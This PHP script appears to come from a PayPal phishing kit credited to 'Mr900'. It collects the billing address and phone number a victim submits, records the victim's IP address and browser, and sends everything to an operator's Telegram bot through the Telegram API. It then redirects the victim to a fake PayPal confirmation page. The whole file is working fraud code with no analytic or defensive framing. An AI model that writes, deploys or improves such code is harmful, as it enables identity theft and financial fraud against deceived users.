<?php

include "../../Config.php";
require "../os.php";
require "../geoplugin.php";
include('../getig.php');

$address1 = isset($_POST['address1']) ? $_POST['address1'] : '';
$address2 = isset($_POST['address2']) ? $_POST['address2'] : '';
$city = isset($_POST['city']) ? $_POST['city'] : '';
$state = isset($_POST['state']) ? $_POST['state'] : '';
$zipCode = isset($_POST['zip']) ? $_POST['zip'] : '';
$country = isset($_POST['country']) ? $_POST['country'] : '';
$phone = isset($_POST['phone']) ? $_POST['phone'] : '';

// Prepare the message
$message = "📝########## 【 BILLING INFORMATION 】 ##########📝\n";
$message .= "\n";
$message .= "🏠 Address 1  : " . $address1 . "\n";
$message .= "🏠 Address 2  : " . $address2 . "\n";
$message .= "🏙️ City       : " . $city . "\n";
$message .= "🏛️ State      : " . $state . "\n";
$message .= "📮 Zip Code   : " . $zipCode . "\n";
$message .= "🌍 Country    : " . $country . "\n";
$message .= "📞 Phone      : " . $phone . "\n";
$message .= "\n";
$message .= "🌐########### 【 IP TRACING INFO 】 ###########🌐\n";
$message .= "\n";
$message .= "🆔 IP      : https://whatismyip.com/ip/" . $_SERVER['REMOTE_ADDR'] . "\n";
$message .= "🕒 Time    : " . date('Y-m-d H:i:s') . "\n";
$message .= "🖥️ Browser : " . $_SERVER['HTTP_USER_AGENT'] . "\n";
$message .= "\n";
$message .= "💳################【 PAYPAL 】###############💳\n";
$message .= "\n©️ Mr900 | Telegram @mr900com\n"; // Copyright in the message

@file_get_contents("https://api.telegram.org/bot".$api."/sendMessage?chat_id=".$chatid."&text=" . urlencode($message));

$dir = "done.php?country.x=".$countrycode."&locale.x=".getLG($countrycode)."_".$countrycode."&customer.x=ID-PA".$hash."&safety=".$hash2;
header('Location: ../'.$dir);

?>